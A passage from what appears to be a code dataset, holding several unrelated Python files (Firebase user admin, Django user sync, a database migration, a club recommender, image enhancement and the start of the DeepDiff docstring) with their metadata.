db.reference('users')\r\n users.child(uid).delete()\r\n print(\"Successfully deleted user\")\r\n except firebase_admin.auth.AuthError:\r\n print(\"User not found\")\r\n\r\n\r\ncred = credentials.Certificate(\"fuelmanager-188122-firebase-adminsdk-ssjoq-d64a420c68.json\")\r\n\r\nfirebase_admin.initialize_app(cred, {'databaseURL': 'https://fuelmanager-188122.firebaseio.com/'})\r\n\r\nrunning = True\r\nwhile running:\r\n print(\"\"\"\r\n1.Show Users Database\r\n2.Add a User\r\n3.Delete a User\r\n4.Exit/Quit\r\n\"\"\")\r\n\r\n ans = input(\"What would you like to do? 
\")\r\n if ans == \"1\":\r\n show_users()\r\n elif ans == \"2\":\r\n add_user()\r\n elif ans == \"3\":\r\n delete_user()\r\n elif ans == \"4\":\r\n running = False\r\n else:\r\n print(\"\\n Not Valid Choice Try again\")\r\n\r\n\r\n","sub_path":"Additional Files/FuelManagerAdmin/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"297260529","text":"from django.conf import settings\nfrom django.core.management.base import BaseCommand, CommandError\nfrom inventory.common.models import User\n\nimport datetime\nfrom inventory.common.helpers import get_api\n\ndef get_it_personnel():\n return get_api().groups(settings.IT_GROUP).get()['users']\n\ndef it_users():\n api = get_api()\n for username in get_it_personnel():\n user = api.users(username).get()\n username = user.get('username')\n u,_ = User.objects.get_or_create(username=username)\n u.first_name = user.get('first_name')\n u.last_name = user.get('last_name')\n u.is_superuser = True\n u.is_staff = True\n u.save()\n\nclass Command(BaseCommand):\n help = 'Sync IT users from FUM for Admin rights'\n\n def handle(self, *args, **options):\n it_users()\n","sub_path":"inventory/common/management/commands/sync_it.py","file_name":"sync_it.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"349827979","text":"from GeradorDeAnuncios.Gerador import Anos\nfrom GeradorDeAnuncios.Gerador.TituloTraco import TituloTraco\nfrom GeradorDeAnuncios.Gerador.StopWords import StopWord\nfrom GeradorDeAnuncios.Gerador.TituloAnoCompleto import TituloAnoCompleto\n\n\nclass Titulo:\n\n def __init__(self, produto):\n self._produto = produto\n self._stopWord = StopWord(\"C:/Users/matheus.bertho/Desktop/Filosofo \"\n \"Piton/AutParts/GeradorDeAnuncios/CriadorDeAnunciosMagento/stopWords/stopwords\"\n \"-titulo.csv\").stopWorld()\n self._dicionario = produto.createDict()\n self._sap = produto.getSap()\n self._sku = produto.getSku()\n self._mostrarExemplos = self._arrayExemplosDados(self._dicionario)[0] # lista para utilizar\n self._utilizarDados = self._arrayExemplosDados(self._dicionario)[1] # lista para mostrar exemplo\n self._order = []\n self.anos = Anos.Anos(self._utilizarDados[2])\n\n def selecionaOrdem(self):\n mostraExemplos = self._mostrarExemplos\n utilizaDados = self._utilizarDados\n print('-' * 35)\n print(mostraExemplos)\n print('-' * 35)\n print(utilizaDados)\n print('-' * 35)\n opcaoFinal = []\n mostraFinal = []\n stop = False\n while not stop:\n print('-' * 35)\n print(\"selecione X para terminar e V para voltar!\")\n print(\"Selecione a ordem que quer montar seu texto: \")\n opt = str(input(\">> \"))\n print('-' * 35)\n\n if opt.lower() == \"v\":\n if len(mostraFinal) <= 0:\n print(\"Lista Vazia escolha uma opção!\")\n continue\n del (mostraFinal[-1])\n self._mostraTitleAtual(mostraFinal, utilizaDados)\n continue\n\n if opt.lower() == \"x\":\n stop = True\n continue\n try:\n mostraFinal.append(opt)\n self._mostraTitleAtual(mostraFinal, utilizaDados)\n opcaoFinal.append(int(opt))\n except ValueError:\n print(\"Insira um valor valido de escolha!\")\n except IndexError:\n print(\"Insira um valor valido de escolha!\")\n\n if len(opcaoFinal) <= 0:\n exit()\n self._order = opcaoFinal\n return opcaoFinal\n\n def _mostraTitleAtual(self, lista, opcoes):\n for x in lista:\n if x == '3':\n print('2001 2002' + ' ', end=\"\")\n continue\n 
print(opcoes[int(x)] + ' ', end=\"\")\n print()\n\n def _arrayExemplosDados(self, dicionario):\n # array que gera uma lista para mostrar ao usuario e outra para utilizar\n dadosDiscionario = []\n arrayTexto = []\n arrayFinal = []\n dicionarioEscolha = {}\n acc = 0\n for infoDicionario in dicionario:\n dadosDiscionario.append(infoDicionario)\n for resultadoDicionario in range(len(dadosDiscionario)):\n infoDicionario = dadosDiscionario[resultadoDicionario]\n result = dicionario[infoDicionario]\n texto = dadosDiscionario[resultadoDicionario]\n if result != \"\":\n arrayFinal.append(dicionario[infoDicionario])\n arrayTexto.append(f\"[{str(acc)}] {dadosDiscionario[resultadoDicionario]}\")\n dicionarioEscolha[texto] = result\n acc += 1\n return arrayTexto, arrayFinal\n\n def criaTitulos(self):\n order = self._order\n s = True\n if 2 in order and 3 in order:\n print(\"Não escolha duas opções de anos!!\")\n exit()\n elif 2 in order:\n # (\"Opção 03-05\")\n traco = TituloTraco(self._utilizarDados, self._order)\n return traco.tituloComTraco()\n elif 3 in order or s == True:\n # (\"Opção 2003 2004 2005\")\n listaAnos = TituloAnoCompleto(self._utilizarDados, self._order)\n return listaAnos.criaTituloTodosAnos()\n else:\n return print(\"Criando Titulo Sem ano\")\n\n def setOrder(self, order):\n self._order = order\n","sub_path":"GeradorDeAnuncios/Gerador/Titulo.py","file_name":"Titulo.py","file_ext":"py","file_size_in_byte":4197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"629612704","text":"from srqi.core import inquiry, Parse_Syngo, my_utils\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport collections\r\nimport math\r\n\r\n\r\ndef get_procedures_helper(procs, extra_procs, min_reps):\r\n \"\"\"Extract all the Syngo procedures that we're interested in\r\n (i.e. 
all the ones that have enough repetitions of the same procedure)\r\n and return them as a dictionary mapping cpt code combinations to\r\n lists of procedures\r\n\r\n Arguments:\r\n procs : a list of (SR) Procedure objects\r\n extra_procs : a list of non-SR procedure objects that could not\r\n be assigned to SR procedures\r\n\r\n Returns:\r\n a dictionary mapping cpt codes (represented as strings) to lists of\r\n Syngo objects\r\n \"\"\"\r\n # extract all the syngo procedures from procs and extra_procs\r\n syngo_procs = [p for p in extra_procs if type(p) == Parse_Syngo.Syngo]\r\n for proc in procs:\r\n if proc.has_syngo():\r\n proc.get_syngo().fluoro = my_utils.total_seconds(proc.get_pedal_time())/60.0\r\n syngo_procs.append(proc.get_syngo())\r\n #remove procs without a fluoro time entered\r\n syngo_procs = [p for p in syngo_procs if not p.fluoro is None]\r\n #remove procedures with less than MIN_REPS.value instances of same cpt code\r\n cpt_to_procs = my_utils.organize(syngo_procs, lambda p: p.get_cpts_as_string())\r\n for k in cpt_to_procs.keys():\r\n if len(cpt_to_procs[k]) < min_reps:\r\n del cpt_to_procs[k]\r\n #remove procedures where there is no variation\r\n for k in cpt_to_procs.keys():\r\n remove = True\r\n procs = cpt_to_procs[k]\r\n for i in range(1,len(cpt_to_procs[k])):\r\n if not procs[i] == procs[0]:\r\n remove = False\r\n break\r\n if remove:\r\n del cpt_to_procs[k]\r\n return cpt_to_procs\r\n \r\ndef sort_by_rads_helper(procs, procs_per_window):\r\n \"\"\"\r\n Arguments:\r\n procs : iterable of Syngo objects\r\n procs_per_window :\r\n\r\n Returns:\r\n a dict, rad1_to_procs[rad1]-->list of procedures sorted by dos_start\r\n \"\"\"\r\n rad1_to_procs = my_utils.organize(procs, lambda p:p.rad1)\r\n # sort each radiologist's list of procedures by their start date\r\n for p_list in rad1_to_procs.values():\r\n p_list.sort(key = lambda p:p.dos_start)\r\n # remove rads with too few procedures\r\n for rad1 in rad1_to_procs.keys():\r\n if len(rad1_to_procs[rad1]) < (procs_per_window +2):#have to be able to plot at least 3 points\r\n del rad1_to_procs[rad1]\r\n return rad1_to_procs\r\n\r\n\r\ndef get_procedure_windows(procs, procs_per_window, step_size ):\r\n \"\"\"\r\n Parameters:\r\n procedures : an iterable of Syngo objects\r\n procs_per_window : an int\r\n Returns:\r\n a list of lists of Syngo objects, each representing a window and\r\n having len of procs_per_window. 
each list is sorted by the\r\n procedure fluoro time\r\n \"\"\"\r\n windows = []\r\n for i in range(0, len(procs), step_size):\r\n if i+procs_per_window <= len(procs):\r\n window = sorted(procs[i:i+procs_per_window],\r\n key = lambda x:x.fluoro)\r\n windows.append(window)\r\n return windows\r\n\r\ndef _get_metric(proc, medians, normalize_penalty, clamp,\r\n use_log, log_fluoros, log_means, log_devs):\r\n fluoro = float(proc.fluoro)\r\n if use_log.value:\r\n log_mean = log_means[proc.get_cpts_as_string()]\r\n log_dev = log_devs[proc.get_cpts_as_string()]\r\n metric = (fluoro-log_mean)/log_dev\r\n if metric > 2 and clamp.value: # clamp at 2 std devs\r\n metric = 2\r\n else:\r\n med = medians[proc.get_cpts_as_string()]\r\n metric =(fluoro-med)\r\n if med >0 and normalize_penalty.value:\r\n metric = metric/float(med)\r\n if metric > 1 and clamp.value:#clamp at 2x median value\r\n metric = 1\r\n if metric > med and clamp.value:\r\n metric = med#clamp at 2x median value\r\n return metric\r\n\r\nclass Operator_Improvement(inquiry.Inquiry):\r\n MIN_REPS = inquiry.Inquiry_Parameter(500, \"Minimum procedure count\",\r\n \"The minimum number of times a procedure with the same CPT codes must occur to be considered to have a reasonable distribution\")\r\n PROCS_PER_WINDOW = inquiry.Inquiry_Parameter(400, \"Procedures Per Window\",\r\n \"Number of procedures that should be considered in the sliding window calculation of the operators performance metric.\")\r\n CLAMP = inquiry.Inquiry_Parameter(True, \"Limit penalty to 2x median\",\r\n \"If an operator exceeds the median fluoro time on a given procedure by more than 2x the median, only penalize him by 1x the median.\")\r\n NORMALIZE_PENALTY = inquiry.Inquiry_Parameter(True, \"Normalize penalties\",\r\n \"Divide penalties by the median to account for greater variation in longer procedures.\")\r\n USE_LOG = inquiry.Inquiry_Parameter(True, \"Use Lognormal Z-score\")\r\n \r\n def run(self, procs, context, extra_procs):\r\n cpt_to_procs = get_procedures_helper(procs, extra_procs, self.MIN_REPS.value)\r\n # calculate statistics for each procedure type\r\n medians = {}\r\n std_devs = {}\r\n means = {}\r\n log_fluoros = {}\r\n log_means = {}\r\n log_devs = {}\r\n for cpt, p_list in cpt_to_procs.iteritems():\r\n fluoro_list = [p.fluoro for p in p_list]\r\n medians[cpt] = float(np.median(fluoro_list))\r\n std_devs[cpt] = np.std(fluoro_list)\r\n means[cpt] = np.mean(fluoro_list)\r\n log_fluoros[cpt] = [math.log(x) if not x ==0 else math.log(.5) for x in fluoro_list]\r\n log_means[cpt] = np.mean(log_fluoros[cpt])#default to .5 since that is the lowest number that won't be rounded down to 0\r\n log_devs[cpt] = np.std(log_fluoros[cpt])\r\n # organize by rad1 and sort by date\r\n rad1_to_procs = sort_by_rads_helper( sum(cpt_to_procs.values(),[]), self.PROCS_PER_WINDOW.value )\r\n self._the_meat(rad1_to_procs, medians, log_fluoros, log_means, log_devs)\r\n self.medians = medians\r\n \r\n def _the_meat(self, rad1_to_procs, medians, log_fluoros, log_means, log_devs):\r\n \"\"\"Set self.lookup, which is the meat of self.run\r\n Everything else in self.run is basically preprocessing\r\n\r\n Arguments:\r\n rad1_to_procs : dictionary mapping rad1 (a string) to a list of\r\n Syngo procedures\r\n medians : dictionary mapping a cpt code set (a string) to a float\r\n \"\"\"\r\n # calculate raw deviations\r\n raw_devs = {}\r\n for rad1, p_list in rad1_to_procs.iteritems():\r\n devs = []\r\n for p in p_list:\r\n med = medians[p.get_cpts_as_string()]\r\n 
devs.append(p.fluoro-med)\r\n raw_devs[rad1] = devs\r\n self.raw_devs = raw_devs\r\n # calculate metrics\r\n rad1_to_out = {}\r\n for rad1, p_list in rad1_to_procs.iteritems():\r\n out = []\r\n metric_queue = collections.deque()\r\n cum_metric = 0\r\n for i, proc in enumerate(p_list):\r\n \r\n metric = _get_metric(proc, medians = medians,\r\n normalize_penalty = self.NORMALIZE_PENALTY,\r\n clamp = self.CLAMP,\r\n use_log = self.USE_LOG,\r\n log_fluoros = log_fluoros,\r\n log_means = log_means,\r\n log_devs = log_devs)\r\n cum_metric += metric\r\n metric_queue.append(metric)\r\n if len(metric_queue)>=self.PROCS_PER_WINDOW.value:\r\n if len(metric_queue) > self.PROCS_PER_WINDOW.value:\r\n cum_metric -= metric_queue.popleft()\r\n if i == len(p_list)-1 or not (proc.dos_start == p_list[i+1].dos_start):\r\n out.append((proc.dos_start, cum_metric/self.PROCS_PER_WINDOW.value))\r\n rad1_to_out[rad1] = out\r\n self.lookup = rad1_to_out #rad1_to_out[rad1][window_number] = (date, metric value)\r\n\r\n\r\n def get_tables(self):\r\n out = []\r\n for rad1 in self.lookup.keys():\r\n dates, metrics = zip(*self.lookup[rad1])\r\n dates = [''] + list(dates)\r\n metrics = [rad1] + list(metrics)\r\n out.append((dates,metrics))\r\n medians_table = [(\"Procedure Type\", \"Median Fluoro Time\")]\r\n for cpts, median in self.medians.iteritems():\r\n medians_table.append((cpts, median))\r\n out.append(medians_table)\r\n return out\r\n\r\n def _get_all_together_figure(self, legend = False):\r\n fig = plt.figure()\r\n from matplotlib import cm\r\n colormap = cm.get_cmap(name='hsv')\r\n colors = [colormap(i) for i in np.linspace(0,0.9, len(self.lookup.keys()))]\r\n for i,rad1 in enumerate(self.lookup.keys()):\r\n dates, metrics = zip(*self.lookup[rad1]) #pythonic idiom for \"unzip\"\r\n plt.plot(dates, metrics, color = colors[i], label =rad1)\r\n plt.title(\"All combined\")\r\n plt.xlabel(\"Window End Date\")\r\n plt.ylabel(\"Metric (positive values --> higher fluoro time)\")\r\n fig.autofmt_xdate()\r\n if legend:\r\n plt.legend()\r\n return fig\r\n \r\n \r\n def get_figures(self):\r\n figs = []\r\n #all together\r\n figs.append(self._get_all_together_figure(False))\r\n figs.append(self._get_all_together_figure(True))\r\n axis_ranges = plt.axis()\r\n #individual operators\r\n for rad1 in self.lookup.keys():\r\n dates, metrics = zip(*self.lookup[rad1]) #pythonic idiom for \"unzip\"\r\n fig = plt.figure()\r\n plt.plot(dates, metrics)\r\n plt.axis(axis_ranges)\r\n plt.title(rad1)\r\n plt.xlabel(\"Window End Date\")\r\n plt.ylabel(\"Metric (positive values --> higher fluoro time)\")\r\n fig.autofmt_xdate()\r\n figs.append(fig)\r\n \r\n #TODO: all averaged together\r\n \r\n return figs\r\n\r\n \r\nif __name__ == '__main__':\r\n inquiry.inquiry_main(Operator_Improvement, 'bjh')\r\n\r\n","sub_path":"inquiries/operator_improvement.py","file_name":"operator_improvement.py","file_ext":"py","file_size_in_byte":10499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"298886998","text":"from setuptools import setup, find_packages\n\nversion_parts = (7, 10, 0)\nversion = '.'.join(map(str, version_parts))\n\ngh_lenses =\\\n 'git+https://github.com/ingolemo/python-lenses.git#egg=lenses'\n\nsetup(\n name='tryp',\n description='fp data structures',\n version=version,\n author='Torsten Schmits',\n author_email='torstenschmits@gmail.com',\n license='MIT',\n url='https://github.com/tek/tryp',\n packages=find_packages(exclude=['unit', 'unit.*']),\n install_requires=[\n 'fn',\n 'toolz',\n 
'lenses',\n ],\n tests_require=[\n 'spec',\n 'flexmock',\n 'sure',\n ],\n dependency_links=[\n gh_lenses,\n ]\n)\n","sub_path":"pypi_install_script/tryp-7.10.0.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"136869359","text":"\"\"\"add root tables\n\nRevision ID: ea22133a5f12\nRevises:\nCreate Date: 2019-06-26 09:50:57.401060\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nimport geoalchemy2\n\n\n# revision identifiers, used by Alembic.\nrevision = 'ea22133a5f12'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.execute('CREATE SCHEMA bdc')\n\n op.create_table('users',\n sa.Column('created_at', sa.DateTime(), nullable=True),\n sa.Column('updated_at', sa.DateTime(), nullable=True),\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('full_name', sa.String(), nullable=False),\n sa.Column('email', sa.String(), nullable=False),\n sa.Column('password', sa.String(), nullable=False),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('email'),\n schema='bdc'\n )\n op.create_table('luc_classification_system',\n sa.Column('created_at', sa.DateTime(), nullable=True),\n sa.Column('updated_at', sa.DateTime(), nullable=True),\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('authority_name', sa.Text(), nullable=False),\n sa.Column('system_name', sa.Text(), nullable=False),\n sa.Column('description', sa.Text(), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['user_id'], ['bdc.users.id'], ondelete='NO ACTION'),\n sa.PrimaryKeyConstraint('id'),\n schema='bdc'\n )\n op.create_table('luc_class',\n sa.Column('created_at', sa.DateTime(), nullable=True),\n sa.Column('updated_at', sa.DateTime(), nullable=True),\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('class_name', sa.Text(), nullable=False),\n sa.Column('description', sa.Text(), nullable=False),\n sa.Column('luc_classification_system_id', sa.Integer(), nullable=False),\n sa.Column('parent_id', sa.Integer(), nullable=True),\n sa.Column('user_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['luc_classification_system_id'], ['bdc.luc_classification_system.id'], ondelete='NO ACTION'),\n sa.ForeignKeyConstraint(['parent_id'], ['bdc.luc_class.id'], ondelete='NO ACTION'),\n sa.ForeignKeyConstraint(['user_id'], ['bdc.users.id'], ondelete='NO ACTION'),\n sa.PrimaryKeyConstraint('id'),\n schema='bdc'\n )\n op.create_table('observation',\n sa.Column('created_at', sa.DateTime(), nullable=True),\n sa.Column('updated_at', sa.DateTime(), nullable=True),\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('start_date', sa.Date(), nullable=False),\n sa.Column('end_date', sa.Date(), nullable=False),\n sa.Column('location', geoalchemy2.types.Geometry(geometry_type='POINT', srid=4326), nullable=True),\n sa.Column('class_id', sa.Integer(), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['class_id'], ['bdc.luc_class.id'], ondelete='NO ACTION'),\n sa.ForeignKeyConstraint(['user_id'], ['bdc.users.id'], ondelete='NO ACTION'),\n sa.PrimaryKeyConstraint('id'),\n schema='bdc'\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_table('observation', schema='bdc')\n op.drop_table('luc_class', schema='bdc')\n op.drop_table('luc_classification_system', schema='bdc')\n op.drop_table('users', schema='bdc')\n\n op.execute('DROP SCHEMA bdc')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/ea22133a5f12_add_root_tables.py","file_name":"ea22133a5f12_add_root_tables.py","file_ext":"py","file_size_in_byte":3457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"182130477","text":"\"\"\"\nGlobal constants\n\"\"\"\n\n# Colors\nblack = (0, 0, 0)\nwhite = (255, 255, 255)\nblue = (0, 0, 255)\nred = (255, 0, 0)\ngreen = (0, 255, 0)\n\n\n# Screen dimensions\nSCREEN_WIDTH = 400\nSCREEN_HEIGHT = 600\nscreenSize = (SCREEN_WIDTH, SCREEN_HEIGHT)\n","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"211242068","text":"from mongoengine import Document\nclass MongoService:\n \"\"\"\n This class provides various MongoDB-related services. It is a lot easier to separate the DB operations\n into a separate service than to write DB-related code directly in each service.\n \"\"\"\n\n @staticmethod\n def save_to_db(mongo_obj:Document):\n \"\"\"\n This function receives a MongoEngine document object and saves it in the database.\n :param mongo_obj:\n :return:\n \"\"\"\n try:\n db_result = mongo_obj.save()\n return True, db_result.id\n except Exception as e:\n return False, str(e)\n\n","sub_path":"Services/MongoService.py","file_name":"MongoService.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"245714016","text":"####### RECOMMENDER.PY #######\n####### This file contains the Recommender class. 
A Recommender object runs #######\n####### the whole recommender system (except the GUI) #######\n\nfrom Recommender_Classes import Club\nfrom Recommender_Classes import User\nfrom Recommender_Classes import Event\nfrom Recommender_Classes import Interest\n\n# import to read the Excel file data\nimport pandas as pd\nimport xlrd\n\nclass Recommender:\n \"\"\"The hub of activity for the project\"\"\"\n\n # the constructor for the recommender class\n # initializes the per-instance state here (class-level lists would be\n # shared across every Recommender instance) and then adds the clubs\n # from the excel file\n def __init__(self):\n self.__users = [] # list of students\n self.__clubs = [] # list of clubs\n self.__interests = [] # list of possible interests\n self.addExcelClubs()\n\n # create a user and add it to the __users list\n # param: student's ID\n # returns: the new user\n def addUser(self, id):\n newUser = User(id) # call __init__ of the user class\n self.__users.append(newUser) # add the user to the list\n return newUser\n\n # add a new club to the list\n # param: the name of the club, its category, and its ID\n # returns: the new club\n def addClub(self, clubName, clubCategory, clubID, description):\n newClub = Club(clubName, clubCategory, clubID, description, self)\n self.__clubs.append(newClub)\n return newClub\n\n # adds an interest to the list of possibilities (__interests)\n # param: the interest id, the interest name, and its category id\n # returns: a None object\n def addInterestToList(self, interestId, interestName, interestCategoryId):\n newInterest = Interest(interestName)\n self.__interests.append(newInterest)\n return None\n\n # gets the club based on the club name\n # returns: the club object if it is found; o.w. returns -1\n def getClub(self, clubName):\n for club in self.__clubs:\n if(clubName.lower() == club.getClubName().lower()):\n return club # return the pointer to the club\n return -1 # something went wrong if I'm here..\n\n # gets the recommendation from the user based on their clubs and returns it\n # param: student's ID\n # returns the recommendation\n def createClubRecommendation(self, id):\n # set recommendation to None (NULL) so it has the scope of the method\n recommendation = None\n for user in self.__users:\n if(user.id == id):\n # call findClub() in the user to get recommendation\n recommendation = user.findClub()\n return recommendation\n return -1\n\n # returns the user that is being referenced\n # param: the object itself and the student's id\n # returns: the user object if it is found\n def getUser(self, id):\n for user in self.__users:\n if(user.id == id):\n return user\n return None\n\n # looks at the user's interests and recommends a club based on them\n # param: the id of the student for which to get the recommendation and the object itself\n # returns: the interest object to the caller\n def createInterestRecommendation(self, id):\n user = self.getUser(id)\n if(user is not None):\n recommendation = user.getInterestRecommendation()\n return recommendation\n\n # gets the next club event\n # param: the club object to look at\n # returns: the event\n def getNextClubEvent(self, club):\n event = club.getNextEvent()\n return event\n\n # adds the clubs from the excel file and creates the categories\n # NOTE: categories are acting as the interests at this point\n # param: none to be passed but it takes the self\n # returns: None\n def addExcelClubs(self):\n excel_file = 'data/Clubs.xlsx'\n\n excelClubs = pd.read_excel(excel_file)\n\n for index, rows in excelClubs.iterrows():\n # look for the category in the interests\n 
category = rows['Category']\n foundInInterests = False\n # add the club\n self.addClub(rows['Name'], rows['Category'], rows['ID'], rows['Description'])\n newClub = self.__clubs[len(self.__clubs)-1]\n for interest in self.__interests:\n if (category == interest.getInterestName()):\n # connect the club to its interest that we just found\n interest.addRelatedClub(newClub)\n foundInInterests = True\n if(foundInInterests == False): # if the interest was not found\n # add the interest because it doesn't already exist\n self.addInterestToList(0, category, 0)\n # connect the two\n self.__interests[len(self.__interests)-1].addRelatedClub(newClub)\n return None\n\n # will find the interest object based on the name\n # param: the string name of the interest\n # return: the interest if it's found; o.w. nothing\n def __findInterest(self, interestName):\n for interest in self.__interests:\n if(interest.getInterestName() == interestName):\n return interest\n\n # adds an interest to the user\n # param: the student's id and the string name of the interest\n # returns: None\n def addUserInterest(self, id, interestName):\n user = self.getUser(id)\n if(user is not None):\n interest = self.__findInterest(interestName)\n user.addInterest(interest)\n return None\n\n # adds an event to a club\n # param: the club name (string), the event name (string), date (datetime object), location (string), and description (string)\n # returns: 0\n def addEventToClub(self, clubName, name, date, location, description):\n club = self.getClub(clubName)\n event = Event(name, date, club, location, description)\n club.addEvent(event)\n return 0\n\n # returns a list of the next upcoming event for each of the user's clubs\n # param: the user's id numbers\n # returns: a list(/array) of events\n def getUserUpcomingEvents(self, idNumber):\n user = self.getUser(idNumber)\n eventList = user.getNextEvents()\n return eventList\n\n # get the names of all the clubs\n # param: none\n # returns: a list of club names (strings)\n def getClubNames(self):\n clubNames = []\n for club in self.__clubs:\n clubNames.append(club.getClubName())\n return clubNames\n","sub_path":"recommender.py","file_name":"recommender.py","file_ext":"py","file_size_in_byte":6634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"317720059","text":"import cv2\nimport numpy as np\n\n\ndef stretchlim(img, tol=(0.0, 0.99)):\n tol_low = tol[0]\n tol_high = tol[1]\n\n hist = cv2.calcHist([img], [0], None, [256], [0, 256])\n cdf = np.cumsum(hist) / np.sum(hist)\n # take the first bin index past each tolerance so the limits are\n # scalar intensities rather than whole arrays of indexes\n ilow = int(np.where(cdf > tol_low)[0][0])\n ihigh = int(np.where(cdf >= tol_high)[0][0])\n th = (ilow, ihigh)\n return th\n\n\ndef imadjust(img, th):\n img = np.clip(img, th[0], th[1])\n img = cv2.equalizeHist(img)\n return img\n\n\ndef adjust_iris(img, r_th=(0.05, 0.95)):\n th = stretchlim(img, (0.0, 0.99))\n rfl = (img >= th[1]).astype(np.uint8) # cv2 morphology expects uint8, not bool\n eps_shape = int(np.round(0.005 * img.size))\n rfl = cv2.morphologyEx(rfl, cv2.MORPH_CLOSE, cv2.getStructuringElement(cv2.MORPH_RECT, (eps_shape, eps_shape)))\n rfl = cv2.dilate(rfl, cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (7, 7)))\n\n th = stretchlim(img * (1 - rfl), r_th)\n img = imadjust(img, th)\n return img\n\n\ndef enh_contrast(img):\n img = np.clip(img, *stretchlim(img, (0.05, 0.95))) # np.clip requires both a low and a high bound\n return cv2.equalizeHist(img)\n","sub_path":"util/img_enhance.py","file_name":"img_enhance.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
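A minimal usage sketch for the img_enhance helpers above, assuming an 8-bit single-channel image as input; the file name 'iris.png' and this calling code are illustrative additions, not part of the original module:

import cv2
from util.img_enhance import stretchlim, imadjust, adjust_iris

# load as grayscale so the helpers receive the 2-D uint8 array they expect
img = cv2.imread('iris.png', cv2.IMREAD_GRAYSCALE)

# contrast-stretch between the intensities where the histogram CDF
# crosses 0.0 and 0.99, then equalize
th = stretchlim(img, (0.0, 0.99))
stretched = imadjust(img, th)

# mask out specular reflections first, then stretch and equalize the rest
enhanced = adjust_iris(img, r_th=(0.05, 0.95))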
+{"seq_id":"62461044","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# In order to run the docstrings:\n# python3 -m deepdiff.diff\n# You might need to run it many times since dictionaries come in different orders\n# every time you run the docstrings.\n# However the docstring expects it in a specific order in order to pass!\n\nfrom __future__ import absolute_import\nfrom __future__ import print_function\n\nimport difflib\nimport logging\nimport jsonpickle\n\nfrom decimal import Decimal\n\nfrom collections import Mapping\nfrom collections import Iterable\n\nfrom deepdiff.helper import py3, strings, bytes_type, numbers, ListItemRemovedOrAdded, notpresent, IndexedHash, Verbose\nfrom deepdiff.model import RemapDict, ResultDict, TextResult, TreeResult, DiffLevel\nfrom deepdiff.model import DictRelationship, AttributeRelationship # , REPORT_KEYS\nfrom deepdiff.model import SubscriptableIterableRelationship, NonSubscriptableIterableRelationship, SetRelationship\nfrom deepdiff.contenthash import DeepHash\n\nif py3: # pragma: no cover\n from itertools import zip_longest\nelse: # pragma: no cover\n from itertools import izip_longest as zip_longest\n\nlogger = logging.getLogger(__name__)\n\n\nclass DeepDiff(ResultDict):\n r\"\"\"\n **DeepDiff**\n\n Deep Difference of dictionaries, iterables, strings and almost any other object.\n It will recursively look for all the changes.\n\n DeepDiff 3.0 added the concept of views.\n There is a default \"text\" view and a \"tree\" view.\n\n **Parameters**\n\n t1 : A dictionary, list, string or any python object that has __dict__ or __slots__\n This is the first item to be compared to the second item\n\n t2 : dictionary, list, string or almost any python object that has __dict__ or __slots__\n The second item is to be compared to the first one\n\n ignore_order : Boolean, defalt=False ignores orders for iterables.\n Note that if you have iterables contatining any unhashable, ignoring order can be expensive.\n Normally ignore_order does not report duplicates and repetition changes.\n In order to report repetitions, set report_repetition=True in addition to ignore_order=True\n\n report_repetition : Boolean, default=False reports repetitions when set True\n ONLY when ignore_order is set True too. 
This works for iterables.\n This feature currently is experimental and is not production ready.\n\n significant_digits : int >= 0, default=None.\n If it is a non negative integer, it compares only that many digits AFTER\n the decimal point.\n\n This only affects floats, decimal.Decimal and complex.\n\n Internally it uses \"{:.Xf}\".format(Your Number) to compare numbers where X=significant_digits\n\n Note that \"{:.3f}\".format(1.1135) = 1.113, but \"{:.3f}\".format(1.11351) = 1.114\n\n For Decimals, Python's format rounds 2.5 to 2 and 3.5 to 4 (to the closest even number)\n\n verbose_level : int >= 0, default = 1.\n Higher verbose level shows you more details.\n For example verbose level 1 shows what dictionary item are added or removed.\n And verbose level 2 shows the value of the items that are added or removed too.\n\n exclude_paths: list, default = None.\n List of paths to exclude from the report.\n\n exclude_types: list, default = None.\n List of object types to exclude from the report.\n\n view: string, default = text\n Starting the version 3 you can choosethe view into the deepdiff results.\n The default is the text view which has been the only view up until now.\n The new view is called the tree view which allows you to traverse through\n the tree of changed items.\n\n **Returns**\n\n A DeepDiff object that has already calculated the difference of the 2 items.\n\n **Supported data types**\n\n int, string, unicode, dictionary, list, tuple, 